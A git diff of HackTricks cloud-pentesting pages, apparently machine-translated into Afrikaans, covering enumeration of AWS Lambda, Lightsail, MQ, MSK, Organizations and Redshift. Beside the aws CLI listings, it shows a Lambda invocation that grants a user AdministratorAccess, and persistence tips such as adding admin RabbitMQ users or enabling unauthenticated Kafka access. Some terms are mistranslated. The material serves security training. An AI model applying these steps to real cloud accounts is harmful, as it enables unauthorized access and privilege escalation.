The **weights** of **each** of the **versions** exposed inside and alias will decide **which alias receive the invocation** (it can be 90%-10% for example).\ -If the code of **one** of the aliases is **vulnerable** you can send **requests until the vulnerable** versions receives the exploit. +'n Lambda kan **verskeie weergawes** hĂȘ.\ +En dit kan **meer as 1** weergawe hĂȘ wat blootgestel word via **aliases**. Die **gewigte** van **elke** van die **weergawes** wat binne 'n alias blootgestel word, sal besluit **watter alias die oproep ontvang** (dit kan 90%-10% wees byvoorbeeld).\ +As die kode van **een** van die aliases **kwetsbaar** is, kan jy **versoeke stuur totdat die kwesbare** weergawe die ontploffing ontvang. ![](<../../../images/image (223).png>) ### Resource Policies -Lambda resource policies allow to **give access to other services/accounts to invoke** the lambda for example.\ -For example this is the policy to allow **anyone to access a lambda exposed via URL**: +Lambda hulpbronbeleide laat toe om **toegang te gee aan ander dienste/rekeninge om die** lambda aan te roep.\ +Byvoorbeeld, dit is die beleid om **enigeen toe te laat om 'n lambda wat via URL blootgestel is, te benader**:
-Or this to allow an API Gateway to invoke it: +Of dit om 'n API Gateway toe te laat om dit aan te roep:
### Lambda Database Proxies -When there are **hundreds** of **concurrent lambda requests**, if each of them need to **connect and close a connection to a database**, it's just not going to work (lambdas are stateless, cannot maintain connections open).\ -Then, if your **Lambda functions interact with RDS Proxy instead** of your database instance. It handles the connection pooling necessary for scaling many simultaneous connections created by concurrent Lambda functions. This allows your Lambda applications to **reuse existing connections**, rather than creating new connections for every function invocation. +Wanneer daar **honderde** **gelyktydige lambda versoeke** is, as elkeen daarvan moet **verbinding maak en 'n verbinding met 'n databasis sluit**, gaan dit eenvoudig nie werk nie (lambdas is staatloos, kan nie verbindings oop hou nie).\ +Dan, as jou **Lambda funksies met RDS Proxy in plaas van** jou databasis instansie interaksie het. Dit hanteer die verbinding pooling wat nodig is om baie gelyktydige verbindings wat deur gelyktydige Lambda funksies geskep word, te skaal. Dit laat jou Lambda toepassings toe om **bestaande verbindings te hergebruik**, eerder as om nuwe verbindings vir elke funksie oproep te skep. ### Lambda EFS Filesystems -To preserve and even share data **Lambdas can access EFS and mount them**, so Lambda will be able to read and write from it. +Om data te bewaar en selfs te deel, **kan Lambdas EFS benader en dit monteer**, sodat Lambda in staat sal wees om daarvan te lees en te skryf. ### Lambda Layers -A Lambda _layer_ is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files. +'n Lambda _laag_ is 'n .zip lĂȘer argief wat **addisionele kode** of ander inhoud kan bevat. 
'n Laag kan biblioteke, 'n [aangepaste runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, of konfigurasielĂȘers bevat. -It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment. +Dit is moontlik om tot **vyf lae per funksie** in te sluit. Wanneer jy 'n laag in 'n funksie insluit, word die **inhoud na die `/opt`** gids in die uitvoeringsomgewing onttrek. -By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version. +Deur **standaard**, is die **lae** wat jy skep **privaat** vir jou AWS rekening. Jy kan kies om 'n laag met ander rekeninge te **deel** of om die laag **publiek** te maak. As jou funksies 'n laag gebruik wat 'n ander rekening gepubliseer het, kan jou funksies **voortgaan om die laag weergawe te gebruik nadat dit verwyder is, of nadat jou toestemming om toegang tot die laag herroep is**. Dit is egter nie moontlik om 'n nuwe funksie te skep of funksies te werk met 'n verwyderde laag weergawe nie. -Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image. +Funksies wat as 'n houer beeld ontplooi word, gebruik nie lae nie. In plaas daarvan, pak jy jou verkiesde runtime, biblioteke, en ander afhanklikhede in die houer beeld wanneer jy die beeld bou. 
### Lambda Extensions -Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. +Lambda uitbreidings verbeter funksies deur te integreer met verskeie **monitering, waaksaamheid, sekuriteit, en bestuur gereedskap**. Hierdie uitbreidings, bygevoeg via [.zip argiewe met behulp van Lambda lae](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) of ingesluit in [houer beeld ontplooiings](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), werk in twee modi: **intern** en **ekstern**. -- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. -- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. +- **Interne uitbreidings** meng met die runtime proses, wat sy opstart manipuleer met behulp van **taalspesifieke omgewing veranderlikes** en **wrapper skripte**. Hierdie aanpassing geld vir 'n reeks runtimes, insluitend **Java Correto 8 en 11, Node.js 10 en 12, en .NET Core 3.1**. +- **Eksterne uitbreidings** loop as aparte prosesse, wat operasionele belyning met die Lambda funksie se lewensiklus handhaaf. 
Hulle is versoenbaar met verskeie runtimes soos **Node.js 10 en 12, Python 3.7 en 3.8, Ruby 2.5 en 2.7, Java Corretto 8 en 11, .NET Core 3.1**, en **aangepaste runtimes**. ### Enumeration - ```bash aws lambda get-account-settings @@ -93,11 +92,9 @@ aws lambda list-event-source-mappings aws lambda list-code-signing-configs aws lambda list-functions-by-code-signing-config --code-signing-config-arn ``` +### Roep 'n lambda aan -### Invoke a lambda - -#### Manual - +#### Handmatig ```bash # Invoke function aws lambda invoke --function-name FUNCTION_NAME /tmp/out 
@@ -106,83 +103,70 @@ aws lambda invoke --function-name FUNCTION_NAME /tmp/out ## user_name = event['user_name'] aws lambda invoke --function-name --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess], "user_name": "sdf"}' out.txt ``` - -#### Via exposed URL - +#### Deur blootgestelde URL ```bash aws lambda list-function-url-configs --function-name #Get lambda URL aws lambda get-function-url-config --function-name #Get lambda URL ``` +#### Roep Lambda-funksie aan via URL -#### Call Lambda function via URL - -Now it's time to find out possible lambda functions to execute: - +Nou is dit tyd om moontlike lambda-funksies te vind om uit te voer: ``` aws --region us-west-2 --profile level6 lambda list-functions ``` - ![](<../../../images/image (262).png>) -A lambda function called "Level6" is available. Lets find out how to call it: - +'n Lambda-funksie genaamd "Level6" is beskikbaar. Kom ons vind uit hoe om dit aan te roep: ```bash aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6 ``` - ![](<../../../images/image (102).png>) -Now, that you know the name and the ID you can get the Name: - +Nou, dat jy die naam en die ID ken, kan jy die Naam kry: ```bash aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75" ``` - ![](<../../../images/image (237).png>) -And finally call the function accessing (notice that the ID, Name and function-name appears in the URL): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6) +En uiteindelik bel die funksie wat toegang verkry (let op dat die ID, Naam en funksie-naam in die URL verskyn): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6) `URL:`**`https://.execute-api..amazonaws.com//`** -#### Other Triggers +#### Ander Triggers -There are a lot of other sources that can 
trigger a lambda +Daar is baie ander bronne wat 'n lambda kan aktiveer
### Privesc -In the following page you can check how to **abuse Lambda permissions to escalate privileges**: +Op die volgende bladsy kan jy kyk hoe om **Lambda-toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../aws-privilege-escalation/aws-lambda-privesc.md {{#endref}} -### Unauthenticated Access +### Ongeauthentiseerde Toegang {{#ref}} ../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md {{#endref}} -### Post Exploitation +### Post Exploitatie {{#ref}} ../aws-post-exploitation/aws-lambda-post-exploitation/ {{#endref}} -### Persistence +### Volharding {{#ref}} ../aws-persistence/aws-lambda-persistence/ {{#endref}} -## References +## Verwysings - [https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer) - [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md index 9f5ccb1ab..84cb65489 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md 
@@ -4,11 +4,10 @@ ## AWS - Lightsail -Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\ -It's a **minimal EC2 + Route53 + ECS**. +Amazon Lightsail bied 'n **maklike**, liggewig manier vir nuwe wolkgebruikers om voordeel te trek uit AWS se wolkrekenaardienste. Dit stel jou in staat om algemene en pasgemaakte webdienste in sekondes te ontplooi via **VMs** (**EC2**) en **houers**.\ +Dit is 'n **minimale EC2 + Route53 + ECS**. ### Enumeration - ```bash # Instances aws lightsail get-instances #Get all @@ -29,14 +28,13 @@ aws lightsail get-load-balancers aws lightsail get-static-ips aws lightsail get-key-pairs ``` +### Analiseer Snapshotte -### Analyse Snapshots - -It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration). +Dit is moontlik om **instansie en relationele databasis snapshotte van lightsail** te genereer. Daarom kan jy dit op dieselfde manier nagaan as wat jy [**EC2 snapshotte**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) en [**RDS snapshotte**](aws-relational-database-rds-enum.md#enumeration) nagaan. ### Metadata -**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS. +**Metadata-eindpunt is toeganklik vanaf lightsail**, maar die masjiene loop in 'n **AWS-rekening wat deur AWS bestuur word**, so jy beheer nie **watter toestemmings toegeken word** nie. As jy egter 'n manier vind om dit te benut, sal jy direk AWS benut. ### Privesc 
@@ -44,20 +42,16 @@ It's possible to generate **instance and relational database snapshots from ligh ../aws-privilege-escalation/aws-lightsail-privesc.md {{#endref}} -### Post Exploitation +### Post Exploitatie {{#ref}} ../aws-post-exploitation/aws-lightsail-post-exploitation.md {{#endref}} -### Persistence +### Volharding {{#ref}} ../aws-persistence/aws-lightsail-persistence.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md index 8504db545..274ad89fe 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md 
@@ -4,28 +4,27 @@ ## Amazon MQ -### Introduction to Message Brokers +### Inleiding tot Boodskap Brokers -**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates. +**Boodskap brokers** dien as tussenpersoon, wat kommunikasie tussen verskillende sagteware stelsels fasiliteer, wat op verskillende platforms gebou kan wees en in verskillende tale geprogrammeer kan wees. **Amazon MQ** vereenvoudig die ontplooiing, werking en onderhoud van boodskap brokers op AWS. Dit bied bestuurde dienste vir **Apache ActiveMQ** en **RabbitMQ**, wat naatlose voorsiening en outomatiese sagteware weergawe-opdaterings verseker. ### AWS - RabbitMQ -RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers. +RabbitMQ is 'n prominente **boodskap-rygagte sagteware**, ook bekend as 'n _boodskap broker_ of _ry bestuurder_. Dit is fundamenteel 'n stelsel waar rye geconfigureer word. Toepassings koppel met hierdie rye om **boodskappe te stuur en te ontvang**. 
Boodskappe in hierdie konteks kan 'n verskeidenheid inligting dra, wat wissel van opdragte om prosesse op ander toepassings (potensieel op verskillende bedieners) te begin tot eenvoudige teksboodskappe. Die boodskappe word deur die ry-bestuurder sagteware gehou totdat dit deur 'n ontvangende toepassing opgehaal en verwerk word. AWS bied 'n maklik-om-te-gebruik oplossing vir die gasheer en bestuur van RabbitMQ bedieners. ### AWS - ActiveMQ -Apache ActiveMQÂź is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can: +Apache ActiveMQÂź is 'n toonaangewende oopbron, Java-gebaseerde **boodskap broker** bekend vir sy veelsydigheid. Dit ondersteun verskeie bedryfstandaard protokolle, wat uitgebreide kliĂ«nt-compatibiliteit oor 'n wye verskeidenheid tale en platforms bied. Gebruikers kan: -- Connect with clients written in JavaScript, C, C++, Python, .Net, and more. -- Leverage the **AMQP** protocol to integrate applications from different platforms. -- Use **STOMP** over websockets for web application message exchanges. -- Manage IoT devices with **MQTT**. -- Maintain existing **JMS** infrastructure and extend its capabilities. +- Koppel met kliĂ«nte geskryf in JavaScript, C, C++, Python, .Net, en meer. +- Die **AMQP** protokol benut om toepassings van verskillende platforms te integreer. +- **STOMP** oor websockets gebruik vir webtoepassing boodskapuitruil. +- IoT-toestelle met **MQTT** bestuur. +- Bestaande **JMS** infrastruktuur onderhou en sy vermoĂ«ns uitbrei. -ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements. - -## Enumeration +ActiveMQ se robuustheid en buigsaamheid maak dit geskik vir 'n verskeidenheid boodskap vereistes. +## Enumerasie ```bash # List brokers aws mq list-brokers 
@@ -48,9 +47,8 @@ aws mq list-configurations # Creacte Active MQ user aws mq create-user --broker-id --password --username --console-access ``` - > [!WARNING] -> TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this) +> TODO: Dui aan hoe om RabbitMQ en ActiveMQ intern te enumereer en hoe om in alle rye te luister en data te stuur (stuur PR as jy weet hoe om dit te doen) ## Privesc @@ -58,23 +56,19 @@ aws mq create-user --broker-id --password --username --c ../aws-privilege-escalation/aws-mq-privesc.md {{#endref}} -## Unauthenticated Access +## Ongeauthentiseerde Toegang {{#ref}} ../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md {{#endref}} -## Persistence +## Volharding -If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges. +As jy die akrediteerbesonderhede het om toegang tot die RabbitMQ-webkonsol te verkry, kan jy 'n nuwe gebruiker met administratiewe regte skep. -## References +## Verwysings - [https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html](https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html) - [https://activemq.apache.org/](https://activemq.apache.org/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md index 42c7ca640..4c2185014 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md 
@@ -4,22 +4,21 @@ ## Amazon MSK -**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** is a service that is fully managed, facilitating the development and execution of applications processing streaming data through **Apache Kafka**. Control-plane operations, including creation, update, and deletion of **clusters**, are offered by Amazon MSK. The service permits the utilization of Apache Kafka **data-plane operations**, encompassing data production and consumption. It operates on **open-source versions of Apache Kafka**, ensuring compatibility with existing applications, tooling, and plugins from both partners and the **Apache Kafka community**, eliminating the need for alterations in the application code. +**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** is 'n diens wat ten volle bestuur word, wat die ontwikkeling en uitvoering van toepassings wat stroomdata verwerk deur **Apache Kafka** fasiliteer. Beheer-vlak operasies, insluitend die skep, opdateer en verwyder van **clusters**, word deur Amazon MSK aangebied. Die diens laat die gebruik van Apache Kafka **data-vlak operasies** toe, wat data produksie en verbruik insluit. Dit werk op **oop-bron weergawes van Apache Kafka**, wat verseker dat dit versoenbaar is met bestaande toepassings, gereedskap en plugins van beide vennote en die **Apache Kafka-gemeenskap**, wat die behoefte aan veranderinge in die toepassingskode uitskakel. -In terms of reliability, Amazon MSK is designed to **automatically detect and recover from prevalent cluster failure scenarios**, ensuring that producer and consumer applications persist in their data writing and reading activities with minimal disruption. Moreover, it aims to optimize data replication processes by attempting to **reuse the storage of replaced brokers**, thereby minimizing the volume of data that needs to be replicated by Apache Kafka. 
+Wat betroubaarheid betref, is Amazon MSK ontwerp om **outomaties algemene cluster-faal scenario's te detecteer en te herstel**, wat verseker dat produsent- en verbruiker-toepassings voortgaan met hul data skryf- en leesaktiwiteite met minimale onderbreking. Boonop poog dit om data replikasie prosesse te optimaliseer deur te probeer om die **berging van vervangde brokers te hergebruik**, wat die volume van data wat deur Apache Kafka gerepliseer moet word, minimaliseer. -### **Types** +### **Tipes** -There are 2 types of Kafka clusters that AWS allows to create: Provisioned and Serverless. +Daar is 2 tipes Kafka-clusters wat AWS toelaat om te skep: Provisioned en Serverless. -From the point of view of an attacker you need to know that: +Van die oogpunt van 'n aanvaller moet jy weet dat: -- **Serverless cannot be directly public** (it can only run in a VPN without any publicly exposed IP). However, **Provisioned** can be configured to get a **public IP** (by default it doesn't) and configure the **security group** to **expose** the relevant ports. -- **Serverless** **only support IAM** as authentication method. **Provisioned** support SASL/SCRAM (**password**) authentication, **IAM** authentication, AWS **Certificate** Manager (ACM) authentication and **Unauthenticated** access. - - Note that it's not possible to expose publicly a Provisioned Kafka if unauthenticated access is enabled +- **Serverless kan nie direk publiek wees nie** (dit kan slegs in 'n VPN loop sonder enige publiek blootgestelde IP). egter, **Provisioned** kan gekonfigureer word om 'n **publieke IP** te kry (standaard doen dit nie) en die **veiligheidsgroep** te konfigureer om die relevante poorte te **bloot te stel**. +- **Serverless** **ondersteun slegs IAM** as autentikasie metode. **Provisioned** ondersteun SASL/SCRAM (**wagwoord**) autentikasie, **IAM** autentikasie, AWS **Certificate** Manager (ACM) autentikasie en **Onautentiseerde** toegang. 
+- Let daarop dat dit nie moontlik is om 'n Provisioned Kafka publiek bloot te stel as onaudentiseerde toegang geaktiveer is nie. ### Enumeration - ```bash #Get clusters aws kafka list-clusters @@ -43,9 +42,7 @@ aws kafka describe-configuration-revision --arn --revision ``` - -### Kafka IAM Access (in serverless) - +### Kafka IAM Toegang (in serverless) ```bash # Guide from https://docs.aws.amazon.com/msk/latest/developerguide/create-serverless-cluster.html # Download Kafka @@ -75,7 +72,6 @@ kafka_2.12-2.8.1/bin/kafka-console-producer.sh --broker-list $BS --producer.conf # Read messages kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer.config client.properties --topic msk-serverless-tutorial --from-beginning ``` - ### Privesc {{#ref}} @@ -90,14 +86,10 @@ kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer ### Persistence -If you are going to **have access to the VPC** where a Provisioned Kafka is, you could **enable unauthorised access**, if **SASL/SCRAM authentication**, **read** the password from the secret, give some **other controlled user IAM permissions** (if IAM or serverless used) or persist with **certificates**. +As jy **toegang tot die VPC** waar 'n Provisioned Kafka is, gaan hĂȘ, kan jy **ongemagtigde toegang** **aktiveer**, as **SASL/SCRAM-sertifisering**, **lees** die wagwoord uit die geheim, gee 'n paar **ander beheerde gebruiker IAM-toestemmings** (as IAM of serverless gebruik word) of volhard met **sertifikate**. ## References - [https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html](https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md index df5a51a37..3b6c5a2de 100644 
--- a/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md @@ -2,23 +2,22 @@ {{#include ../../../banners/hacktricks-training.md}} -## Baisc Information +## Basiese Inligting -AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization. +AWS Organizations fasiliteer die skep van nuwe AWS-rekeninge sonder om addisionele koste te incurr. Hulpbronne kan moeiteloos toegeken word, rekeninge kan doeltreffend gegroepeer word, en bestuursbeleide kan op individuele rekeninge of groepe toegepas word, wat bestuur en beheer binne die organisasie verbeter. -Key Points: +Belangrike Punten: -- **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges. -- **Resource Allocation**: It simplifies the process of allocating resources across the accounts. -- **Account Grouping**: Accounts can be grouped together, making management more streamlined. -- **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization. +- **Nuwe Rekening Skep**: AWS Organizations laat die skep van nuwe AWS-rekeninge toe sonder ekstra koste. +- **Hulpbron Toekenning**: Dit vereenvoudig die proses om hulpbronne oor die rekeninge toe te ken. +- **Rekening Groepering**: Rekeninge kan saamgegroepeer word, wat bestuur meer gestroomlyn maak. +- **Bestuursbeleide**: Beleide kan op rekeninge of groepe van rekeninge toegepas word, wat nakoming en bestuur oor die organisasie verseker. -You can find more information in: +Jy kan meer inligting vind in: {{#ref}} ../aws-basic-information/ {{#endref}} - ```bash # Get Org aws organizations describe-organization 
@@ -39,13 +38,8 @@ aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y ## You need the permission iam:GetAccountSummary aws iam get-account-summary ``` - -## References +## Verwysings - https://aws.amazon.com/organizations/ {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md index d5cb84f1d..9e4ee6b15 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md @@ -1,28 +1,20 @@ -# AWS - Other Services Enum +# AWS - Ander Dienste Enum {{#include ../../../banners/hacktricks-training.md}} ## Directconnect -Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network). - +Laat toe om **'n korporatiewe private netwerk met AWS te verbind** (sodat jy 'n EC2-instantie kan kompromitteer en toegang tot die korporatiewe netwerk kan verkry). ``` aws directconnect describe-connections aws directconnect describe-interconnects aws directconnect describe-virtual-gateways aws directconnect describe-virtual-interfaces ``` +## Ondersteuning -## Support - -In AWS you can access current and previous support cases via the API - +In AWS kan jy huidige en vorige ondersteuningsake via die API toegang verkry ``` aws support describe-cases --include-resolved-cases ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md index 7ae94d5d6..2922ecd0b 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md 
@@ -4,46 +4,45 @@ ## Amazon Redshift -Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business. +Redshift is 'n volledig bestuurde diens wat kan skaal tot oor 'n petabyte in grootte, wat gebruik word as 'n **data warehouse vir groot data oplossings**. Met Redshift-klusters kan jy analises teen jou datastelle uitvoer met behulp van vinnige, SQL-gebaseerde vrae gereedskap en besigheidsintelligensie toepassings om 'n groter begrip van jou besigheid se visie te verkry. -**Redshift offers encryption at rest using a four-tired hierarchy of encryption keys using either KMS or CloudHSM to manage the top tier of keys**. **When encryption is enabled for your cluster, it can't be disable and vice versa**. When you have an unencrypted cluster, it can't be encrypted. +**Redshift bied versleuteling in rus aan met 'n vier-laag hiĂ«rargie van versleuteling sleutels wat KMS of CloudHSM gebruik om die boonste laag van sleutels te bestuur**. **Wanneer versleuteling geaktiveer is vir jou kluster, kan dit nie gedeaktiveer word nie en omgekeerd**. Wanneer jy 'n nie-versleutelde kluster het, kan dit nie versleuteld word nie. -Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**. +Versleuteling vir jou kluster kan slegs tydens die skepping daarvan plaasvind, en sodra dit versleuteld is, is die data, metadata, en enige snappings ook versleuteld. 
Die laaggelaagdheid van versleuteling sleutels is soos volg, **laag een is die meester sleutel, laag twee is die kluster versleuteling sleutel, die CEK, laag drie, die databasis versleuteling sleutel, die DEK, en uiteindelik laag vier, die data versleuteling sleutels self**. ### KMS -During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective. +Tydens die skepping van jou kluster, kan jy of die **standaard KMS sleutel** vir Redshift kies of jou **eie CMK** kies, wat jou meer buigsaamheid gee oor die beheer van die sleutel, spesifiek vanuit 'n auditeerbare perspektief. -The default KMS key for Redshift is automatically created by Redshift the first time the key option is selected and used, and it is fully managed by AWS. +Die standaard KMS sleutel vir Redshift word outomaties deur Redshift geskep die eerste keer dat die sleutelopsie gekies en gebruik word, en dit word volledig bestuur deur AWS. -This KMS key is then encrypted with the CMK master key, tier one. This encrypted KMS data key is then used as the cluster encryption key, the CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored separately from the cluster. Redshift then sends this encrypted CEK to the cluster over a secure channel where it is stored in memory. +Hierdie KMS sleutel word dan versleuteld met die CMK meester sleutel, laag een. Hierdie versleutelde KMS data sleutel word dan gebruik as die kluster versleuteling sleutel, die CEK, laag twee. Hierdie CEK word dan deur KMS na Redshift gestuur waar dit apart van die kluster gestoor word. Redshift stuur dan hierdie versleutelde CEK na die kluster oor 'n veilige kanaal waar dit in geheue gestoor word. -Redshift then requests KMS to decrypt the CEK, tier two. This decrypted CEK is then also stored in memory. 
Redshift then creates a random database encryption key, the DEK, tier three, and loads that into the memory of the cluster. The decrypted CEK in memory then encrypts the DEK, which is also stored in memory. +Redshift vra dan KMS om die CEK, laag twee, te ontsleutel. Hierdie ontsleutelde CEK word dan ook in geheue gestoor. Redshift skep dan 'n ewekansige databasis versleuteling sleutel, die DEK, laag drie, en laai dit in die geheue van die kluster. Die ontsleutelde CEK in geheue versleutelt dan die DEK, wat ook in geheue gestoor word. -This encrypted DEK is then sent over a secure channel and stored in Redshift separately from the cluster. Both the CEK and the DEK are now stored in memory of the cluster both in an encrypted and decrypted form. The decrypted DEK is then used to encrypt data keys, tier four, that are randomly generated by Redshift for each data block in the database. +Hierdie versleutelde DEK word dan oor 'n veilige kanaal gestuur en apart in Redshift gestoor van die kluster. Beide die CEK en die DEK is nou in die geheue van die kluster gestoor, beide in 'n versleutelde en ontsleutelde vorm. Die ontsleutelde DEK word dan gebruik om datakeys, laag vier, te versleutelen wat ewekansig deur Redshift vir elke datablock in die databasis gegenereer word. -You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3. +Jy kan AWS Trusted Advisor gebruik om die konfigurasie van jou Amazon S3-buckets te monitor en te verseker dat bucket logging geaktiveer is, wat nuttig kan wees vir die uitvoering van sekuriteitsoudites en die opsporing van gebruikspatrone in S3. ### CloudHSM
-Using Redshift with CloudHSM +Gebruik Redshift met CloudHSM -When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates. +Wanneer jy met CloudHSM werk om jou versleuteling uit te voer, moet jy eers 'n vertroude verbinding tussen jou HSM-klient en Redshift opstel terwyl jy kliënt- en bedienersertifikate gebruik. -This connection is required to provide secure communications, allowing encryption keys to be sent between your HSM client and your Redshift clusters. Using a randomly generated private and public key pair, Redshift creates a public client certificate, which is encrypted and stored by Redshift. This must be downloaded and registered to your HSM client, and assigned to the correct HSM partition. +Hierdie verbinding is nodig om veilige kommunikasie te bied, wat toelaat dat versleuteling sleutels tussen jou HSM-klient en jou Redshift-klusters gestuur kan word. Met 'n ewekansig gegenereerde private en publieke sleutel paar, skep Redshift 'n publieke kliëntsertifikaat, wat versleuteld en deur Redshift gestoor word. 